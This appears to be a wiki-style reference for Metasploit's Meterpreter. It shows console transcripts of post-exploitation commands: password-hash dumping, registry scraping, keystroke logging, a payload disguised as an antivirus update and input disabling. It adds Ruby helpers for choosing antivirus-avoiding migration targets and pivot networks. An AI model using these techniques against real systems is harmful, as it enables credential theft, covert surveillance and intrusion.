Metasploit/MeterpreterClient
Introduction
Meterpreter is the Metasploit payload that gives us an interactive command interpreter on a compromised host. It runs in memory inside the exploited process (or inside its own executable when delivered that way), talks back to the Metasploit console over the session's connection, and exposes the commands documented on this page. Additional command sets are loaded at run time as extensions with the use command, and Ruby scripts and an interactive Ruby shell (irb) give access to the same functionality programmatically.
Getting Started
Commands
Core Commands
?
We can use ? or help to show a list of commands with brief descriptions.
background
Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session. We can list sessions with the sessions -l Metasploit command and begin to interact with one again using sessions -i <id>.
meterpreter > background
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.50.112:443 -> 192.168.50.100:1495

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
channel
TODO Displays information about active channels. Channels are the data streams Meterpreter opens to a process or file on the target (for example, the standard input and output of a process started with execute -i); channel -l lists the active channels and the interact, read, write and close commands below take a channel id from that list.
close
TODO Closes a channel
exit
Returns to the Metasploit console and closes the active session. Unlike background, the session is gone afterwards and the target must be exploited again to get a new one.
meterpreter > exit
[*] Meterpreter session 1 closed.
msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.
help
We can use ? or help to show a list of commands with brief descriptions.
interact
TODO Interacts with a channel
irb
We can start the Interactive Ruby Shell with the irb command, allowing us to use the Ruby scripting language to interact with the compromised system. The client variable holds the Meterpreter client object for the current session.
To view the API, we need to run the rdoc command from the Metasploit directory, which will create a doc/index.html file that we can open with a browser. The Rex::Post::Meterpreter section of the generated documentation covers the client object.
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"OS"=>"Windows XP (Build 2600, Service Pack 2).", "Computer"=>"TARGETLAPTOP"}
migrate
Meterpreter initially runs inside the exploited process, or in some cases as its own executable's process. If that process is stopped for any reason (for example, the user closes the exploited application), the Meterpreter session closes with it, so it is good practice to migrate the session to a more stable process such as Windows' explorer.exe. Two things to keep in mind: migration needs sufficient privileges to open the target process, so moving into a process owned by another user may fail, and after migrating the session runs in the security context of the new process (check with getuid). The original process keeps running.
The following example shows the use of a handful of commands in order to locate a process that the user will not close during his or her session. The commands are:
- ps - Show a list of running processes.
- getpid - Display the process Meterpreter is using, which shows an EXE payload meter-443.exe.
- migrate pid - Move Meterpreter to a new process ID number, where we request the McAfee agent.
- getpid - Display the new process Meterpreter is using, which we verify is the McAfee agent process.
meterpreter > ps

Process list
============

    PID   Name                      Path
    ---   ----                      ----
    220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe
    292   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
    484   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    492   smss.exe                  \SystemRoot\System32\smss.exe
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe
    636   services.exe              C:\WINDOWS\system32\services.exe
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe
    956   svchost.exe               C:\WINDOWS\System32\svchost.exe
    1404  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe
    1432  Explorer.EXE              C:\WINDOWS\Explorer.EXE
    1536  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe
    1616  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe
    1692  meter-443.exe             C:\Documents and Settings\Administrator\Desktop\shared\meter-443.exe
    1848  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    1860  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
    1884  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
    1996  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
    3076  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe
    3320  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe
    3424  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
    4032  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe

meterpreter > getpid
Current pid: 1692
meterpreter > migrate 1536
[*] Migrating to 1536...
[*] Migration completed successfully.
meterpreter > ps

Process list
============

    PID   Name                      Path
    ---   ----                      ----
    220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe
    292   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
    484   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    492   smss.exe                  \SystemRoot\System32\smss.exe
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe
    636   services.exe              C:\WINDOWS\system32\services.exe
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe
    744   taskmgr.exe               C:\WINDOWS\system32\taskmgr.exe
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe
    956   svchost.exe               C:\WINDOWS\System32\svchost.exe
    1404  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe
    1432  Explorer.EXE              C:\WINDOWS\Explorer.EXE
    1536  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe
    1616  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe
    1848  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    1860  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
    1884  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
    1996  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
    3076  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe
    3320  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe
    3424  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
    4032  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe

meterpreter > getpid
Current pid: 1536
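Choosing the migration target by hand works for one host, but the decision (skip our own process, prefer a long-lived host such as explorer.exe, stay out of security products that get restarted or updated without warning) is easy to automate. The following Ruby is an added example written for this page, not Metasploit's own code: it parses the text of a ps listing like the one above into the same pid/name/path hashes and picks a target. The preference order and the list of process names to avoid are this example's assumptions, and the sample listing is a constructed subset of the one shown above. Note that it deliberately does not pick mcagent.exe, the process chosen in the walkthrough, because it treats antivirus components as poor hosts.

```ruby
# Added example: pick a stable migration target from a Meterpreter `ps` listing.
# Not part of Metasploit; written to illustrate the selection logic described above.

# Assumption: processes belonging to security products make poor hosts because
# they are inspected, updated or restarted without warning.
AVOID = /mcafee|mcshield|mcsysmon|mcagent|mcproxy|msmpeng|defender|vnc/i

# Assumption: preferred hosts in order. explorer.exe lives as long as the user
# is logged on; the spooler and svchost are long-running services.
PREFERRED = %w[explorer.exe spoolsv.exe svchost.exe].freeze

# Constructed sample: a subset of the listing shown on this page.
SAMPLE_PS = <<~'PS'
  Process list
  ============

      PID   Name           Path
      ---   ----           ----
      220   MPFSrv.exe     C:\Program Files\McAfee\MPF\MPFSrv.exe
      804   svchost.exe    C:\WINDOWS\system32\svchost.exe
      1404  spoolsv.exe    C:\WINDOWS\system32\spoolsv.exe
      1432  Explorer.EXE   C:\WINDOWS\Explorer.EXE
      1536  mcagent.exe    C:\Program Files\McAfee.com\Agent\mcagent.exe
      1692  meter-443.exe  C:\Documents and Settings\Administrator\Desktop\shared\meter-443.exe
      4032  mcshield.exe   C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
PS

# Parse the `ps` text into an array of {'pid','name','path'} hashes, the same
# fields the listing prints. Header and separator lines do not start with a
# number and are skipped.
def parse_ps(text)
  text.each_line.map do |line|
    m = line.match(/^\s*(\d+)\s+(\S+)\s+(.*)$/)
    m && { 'pid' => m[1].to_i, 'name' => m[2], 'path' => m[3].strip }
  end.compact
end

# Return the first process whose name is in PREFERRED, never our own pid and
# never anything whose path matches AVOID. nil when nothing suitable exists.
def pick_migration_target(procs, current_pid)
  candidates = procs.reject { |p| p['pid'] == current_pid || p['path'] =~ AVOID }
  PREFERRED.each do |name|
    found = candidates.find { |p| p['name'].casecmp(name).zero? }
    return found if found
  end
  nil
end

if __FILE__ == $PROGRAM_NAME
  target = pick_migration_target(parse_ps(SAMPLE_PS), 1692)
  puts target ? "migrate #{target['pid']}   (#{target['name']})" : 'no suitable process'
end
```

Inside the irb shell the same decision can be made on live data: client.sys.process.get_processes returns hashes with these keys, client.sys.process.getpid gives the current pid, and client.core.migrate(pid) performs the move. Those calls are the Meterpreter client API as documented by the rdoc output described under irb; the parsing and selection code above is only this example's.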
quit
Returns to the Metasploit console and closes the active session; quit is equivalent to exit.
meterpreter > quit
[*] Meterpreter session 1 closed.
msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.
read
TODO Reads data from a channel
run
We can execute a Meterpreter script using the run command. If no path is specified, Meterpreter will search for the script in the scripts/meterpreter/ directory.
In the following example we are running the scripts/meterpreter/scraper.rb script, which pulls some basic information from the target: system information, password hashes and an export of the registry hives. The information is logged to the ~/.msf3/logs/scraper directory. Each hive is exported to a randomly named .reg file in the target's temp directory, downloaded, and then deleted ("Cleaning"), so the script leaves temporary files on disk briefly and needs enough privilege to read the hives and the SAM.
meterpreter > run scraper.rb
[*] New session on 192.168.50.100:1548...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\xHzyoaiW.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\Administrator\LOCALS~1\Temp\JYCDjVMU.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\Administrator\LOCALS~1\Temp\uEATxCej.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\Administrator\LOCALS~1\Temp\guYOZCzT.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\ZNfDGqdB.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.50.100:1548...
use
For additional commands and functionality we can load Meterpreter extensions with the use command. use -l lists the extensions available to the current session.
In the following example, we would like to use the hashdump command to retrieve password hashes from the target. By using the use priv command we can load the extension that gives us the hashdump command. We can verify this by using ? to list our available commands. Note that reading the SAM requires SYSTEM-level privileges on the target, so hashdump will fail from a session running as an ordinary user even though the command is loaded.
meterpreter > use -l
stdapi
sniffer
incognito
priv
espia
meterpreter > use priv
Loading extension priv...success.
meterpreter > ?
<snip>
Priv: Password database Commands
================================

    Command   Description
    -------   -----------
    hashdump  Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command    Description
    -------    -----------
    timestomp  Manipulate file MACE attributes
write
TODO Writes data to a channel
File System Commands
cat
The cat command displays the contents of a single file. As of the time of this writing, the command will throw an error when trying to read an empty file.
meterpreter > cat passwords.txt
harleydavidson
password
kidsbirthday
cd
To change directory the cd command is used.
The command will accept both back and forward slashes somewhat interchangeably, though using a forward slash seems to work more reliably. "." and ".." refer to the current and parent directory, respectively, and double quotes can be used to access directories with spaces in their names.
meterpreter > pwd
C:\
meterpreter > cd /"Program Files"/"Internet Explorer"
meterpreter > pwd
C:\Program Files\Internet Explorer
meterpreter > cd ../../"documents and settings"/Administrator/Desktop/
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
download
When we need to retrieve a file from the target we use the download command, which transfers the specified file into our local working directory (shown by lpwd). In the event that we need to recursively download an entire directory, we use the download -r command.
meterpreter > download users.txt
[*] downloading: users.txt -> users.txt
[*] downloaded : users.txt -> users.txt
edit
To edit a file using our default text editor we use the edit command. Behind the scenes, Meterpreter downloads a copy of the file to a temporary directory, opens it in the editor, then uploads the modified file when the edit is complete.
meterpreter > edit users.txt
getlwd
We can show the current working directory on our local machine by using getlwd (get local working directory), or by using the alias lpwd (local print working directory).
meterpreter > getlwd
/home/myusername/Desktop/metasploit
meterpreter > lpwd
/home/myusername/Desktop/metasploit
getwd
We can show the current working directory on the exploited machine by using getwd (get working directory), or by using the alias pwd (print working directory).
meterpreter > getwd
C:\Program Files\Internet Explorer
meterpreter > pwd
C:\Program Files\Internet Explorer
lcd
To change the local directory we use the lcd command.
The command accepts arguments in the same way as your operating system's cd command, so refer to your system's documentation for specific instructions. The following example shows lcd on a Linux system.
meterpreter > lpwd
/home/myusername/Desktop/metasploit
meterpreter > lcd ../..
meterpreter > lpwd
/home/myusername
meterpreter > lcd /home/myusername/Desktop/metasploit
meterpreter > lpwd
/home/myusername/Desktop/metasploit
lpwd
We can show the current working directory on our local machine by using lpwd (local print working directory), or by using the alias getlwd (get local working directory).
meterpreter > lpwd
/home/myusername/Desktop/metasploit
meterpreter > getlwd
/home/myusername/Desktop/metasploit
ls
We can see both the current working directory and a detailed listing of files in that directory by using the ls command. File listings are given in a format similar to the GNU ls program: Mode is a POSIX-style octal mode and permission string (40777 for a directory, 100777 for a regular file), and Type is dir or fil. The "Last modified" value in the listing below, Wed Dec 31 18:00:00 -0600 1969, is the Unix epoch rendered in the client's time zone, which means this version did not return file timestamps; do not read it as the real modification time.
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop\shared
===============================================================

Mode              Size   Type  Last modified                    Name
----              ----   ----  -------------                    ----
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969   .
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969   ..
100777/rwxrwxrwx  14965  fil   Wed Dec 31 18:00:00 -0600 1969   meter-443.exe
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969   u3
mkdir
We use mkdir to make a new directory on the target system.
meterpreter > mkdir antivirus-update
Creating directory: antivirus-update
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode             Size  Type  Last modified                    Name
----             ----  ----  -------------                    ----
40777/rwxrwxrwx  0     dir   Wed Dec 31 18:00:00 -0600 1969   .
40777/rwxrwxrwx  0     dir   Wed Dec 31 18:00:00 -0600 1969   ..
40777/rwxrwxrwx  0     dir   Wed Dec 31 18:00:00 -0600 1969   antivirus-update
40777/rwxrwxrwx  0     dir   Wed Dec 31 18:00:00 -0600 1969   shared
40777/rwxrwxrwx  0     dir   Wed Dec 31 18:00:00 -0600 1969   working
pwd
We can show the current working directory on the exploited machine by using pwd (print working directory), or by using the alias getwd (get working directory). The local equivalent is lpwd.
meterpreter > pwd
C:\Program Files\Internet Explorer
meterpreter > getwd
C:\Program Files\Internet Explorer
rmdir
We can remove an empty directory with the rmdir command. The command will throw an error if the directory is not empty.
meterpreter > rmdir antivirus-update
Removing directory: antivirus-update
upload
To send a file to the target system we use the upload command, using the -r switch to recursively upload directories and their contents. The file is placed in the target's current working directory (shown by pwd). In the following example we are uploading a Meterpreter payload renamed to look like an antivirus update.
meterpreter > upload antivirus.exe
[*] uploading  : antivirus.exe -> antivirus.exe
[*] uploaded   : antivirus.exe -> antivirus.exe
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop\antivirus-update
=========================================================================

Mode              Size   Type  Last modified                    Name
----              ----   ----  -------------                    ----
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969   .
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969   ..
100777/rwxrwxrwx  10912  fil   Wed Dec 31 18:00:00 -0600 1969   antivirus.exe
Networking Commands
ipconfig
By using the ipconfig (IP configuration) command we can view a listing of all network interfaces on the target, with the hardware address, IP address and netmask of each. The output of ipconfig is most useful for determining which networks the target is directly connected to, and therefore which networks we may be able to reach through it that are not reachable from our own machine.
For example, looking at the following we can see that the target is connected to the 192.168.50.0/24 network (address 192.168.50.100 with netmask 255.255.255.0), which is the same network our handler at 192.168.50.112 sits on. The loopback interface can be ignored.
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

National Semiconductor DP83815-Based PCI Fast Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0b:cd:30:db:0a
IP Address  : 192.168.50.100
Netmask     : 255.255.255.0
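Working out the connected networks from an ipconfig listing, and which of them we cannot already reach from our own address, is the step that tells us whether a host is worth using as a pivot (see portfwd and route below). The Ruby below is an added example written for this page, not Metasploit code: it parses ipconfig output of the shape shown above into CIDR networks and flags the ones that do not contain our own address. The sample input reuses the two interfaces from the listing above plus a third adapter on 10.0.0.5/24 that is constructed for the example and was not on the original page, so that there is something to flag.

```ruby
require 'ipaddr'

# Added example: derive directly connected networks from Meterpreter `ipconfig`
# text and spot pivot candidates. Not part of Metasploit.

# Constructed sample: the two interfaces shown on this page plus an invented
# third adapter so that a network unreachable from our handler appears.
SAMPLE_IPCONFIG = <<~'IPC'
  MS TCP Loopback interface
  Hardware MAC: 00:00:00:00:00:00
  IP Address  : 127.0.0.1
  Netmask     : 255.0.0.0

  National Semiconductor DP83815-Based PCI Fast Ethernet Adapter - Packet Scheduler Miniport
  Hardware MAC: 00:0b:cd:30:db:0a
  IP Address  : 192.168.50.100
  Netmask     : 255.255.255.0

  Second adapter (constructed for this example)
  Hardware MAC: 00:0c:29:aa:bb:cc
  IP Address  : 10.0.0.5
  Netmask     : 255.255.255.0
IPC

# Pair each "IP Address" line with the following "Netmask" line and return
# [{'interface_ip' => ..., 'network' => 'a.b.c.d/prefix'}, ...], skipping
# loopback and unconfigured (0.0.0.0) interfaces.
def connected_networks(text)
  nets = []
  ip = nil
  text.each_line do |line|
    case line
    when /IP Address\s*:\s*(\S+)/
      ip = Regexp.last_match(1)
    when /Netmask\s*:\s*(\S+)/
      mask = Regexp.last_match(1)
      next if ip.nil?
      addr = IPAddr.new(ip)
      unless addr.loopback? || ip == '0.0.0.0'
        prefix  = IPAddr.new(mask).to_i.to_s(2).count('1')   # 255.255.255.0 -> 24
        network = IPAddr.new("#{ip}/#{mask}")                # masks to the network address
        nets << { 'interface_ip' => ip, 'network' => "#{network}/#{prefix}" }
      end
      ip = nil
    end
  end
  nets
end

# Networks the target can reach that do not contain our own address: these are
# the ones we would need to route or port-forward through the session to reach.
def pivot_candidates(nets, our_ip)
  me = IPAddr.new(our_ip)
  nets.reject { |n| IPAddr.new(n['network']).include?(me) }
end

if __FILE__ == $PROGRAM_NAME
  nets = connected_networks(SAMPLE_IPCONFIG)
  nets.each { |n| puts "#{n['interface_ip']} is on #{n['network']}" }
  pivot_candidates(nets, '192.168.50.112').each { |n| puts "pivot candidate: #{n['network']}" }
end
```

With the handler address from the sessions listing above (192.168.50.112) the 192.168.50.0/24 network is already ours, so only the constructed 10.0.0.0/24 network is reported as a pivot candidate.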
portfwd
Forward a local port to a remote service. portfwd add -l <local port> -p <remote port> -r <remote host> listens on our own machine and relays connections through the session to a host and port that only the target can reach, so tools on our machine can talk to services on the target's internal networks; portfwd list shows existing forwards and portfwd delete removes one.
route
View and modify the routing table. Note that this is the target's own routing table: route with no arguments prints it, and route add <subnet> <netmask> <gateway> / route delete change it on the target. It is not the route command of the Metasploit console, which adds pivoting routes through a session on our side.
System Commands
execute
Execute a command on the target.
The execute command starts a new process on the target; the -f switch names the program to run, for example cmd.exe. By default the process is started in the background and we are only told its process id, which we can confirm with ps. The -i switch opens a channel so we can interact with the process's input and output, and -H starts it hidden so that no window appears on the user's desktop.
meterpreter > execute -f cmd.exe
Process 54124 created.
getpid
Get the current process identifier
getuid
Get the user that the server is running as. Worth re-checking after migrate, since the session takes on the user context of the process it moves into.
kill
Terminate a process
ps
The ps command lists the running processes, and is an important command for a couple of reasons. First, it is a good idea for us to be aware of the applications and services running on the target in order to have awareness of the system (the McAfee processes and WinVNC4.exe below tell us a lot about what is watching this host). Secondly, Meterpreter initially runs inside the exploited process, or in some cases as its own executable's process, and if that process is stopped for any reason the Meterpreter session will close, so ps is how we find a more stable process such as Windows' explorer.exe to migrate to.
meterpreter > ps

Process list
============

    PID   Name                      Path
    ---   ----                      ----
    284   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe
    424   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
    492   smss.exe                  \SystemRoot\System32\smss.exe
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe
    612   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    636   services.exe              C:\WINDOWS\system32\services.exe
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe
    876   NOTEPAD.EXE               C:\WINDOWS\system32\NOTEPAD.EXE
    964   svchost.exe               C:\WINDOWS\System32\svchost.exe
    1348  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe
    1464  Explorer.EXE              C:\WINDOWS\Explorer.EXE
    1540  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe
    1612  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe
    1840  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    1852  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
    1876  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
    1928  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
    1952  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
    3028  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe
    3168  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe
    3240  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
reboot
By running the reboot command, we will restart the target system. The session is lost when the host goes down, so this is only useful if the payload has been made persistent.
meterpreter > reboot
Rebooting...
reg
Modify and interact with the remote registry
rev2self
Calls RevertToSelf() on the remote machine, dropping any impersonated token so that the session returns to the original security context of the process it is running in.
shutdown
Using the shutdown command will power off the target system, closing the session with it.
meterpreter > shutdown
Shutting down...
sysinfo
During the post-exploitation phase, one of the earliest commands that we should run is the sysinfo command. Running this command will give us the computer name and OS version, which often offers a clue to the purpose of the target system (a name like TARGETLAPTOP suggests a user workstation rather than a server).
meterpreter > sysinfo
Computer: TARGETLAPTOP
OS      : Windows XP (Build 2600, Service Pack 2).
User Interface Commands
enumdesktops
TODO List all accessible desktops and window stations
idletime
Using the idletime command will return the length of time that the target system's user has been idle. A long idle time is a good sign that nobody is at the keyboard, which matters before running commands the user would notice, such as uictl, execute without -H, or anything that pops up a window.
meterpreter > idletime
User has been idle for: 51 secs
keyscan_dump
We can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client. The sniffer only sees keystrokes delivered to the desktop of the process Meterpreter is running in: to capture what a logged-on user types, first migrate into a process on that user's desktop such as explorer.exe, and to capture logon credentials migrate into winlogon.exe.
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
This text is actually being typed into the target's keyboard.<Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
keyscan_start
Begins recording keystrokes on the target. See keyscan_dump above for the full keyscan_start / keyscan_dump / keyscan_stop sequence and the note on which desktop the sniffer sees.
meterpreter > keyscan_start
Starting the keystroke sniffer...
keyscan_stop
Stops recording keystrokes on the target. See keyscan_dump above for the full keyscan_start / keyscan_dump / keyscan_stop sequence.
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
setdesktop
TODO Move to a different workstation and desktop
uictl
Using the uictl command we have the ability to disable and re-enable keyboard and mouse input on the target. This is immediately obvious to anyone sitting at the machine, so check idletime first and remember to enable the devices again.
meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enable mouse
Enabling mouse...
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl enable keyboard
Enabling keyboard...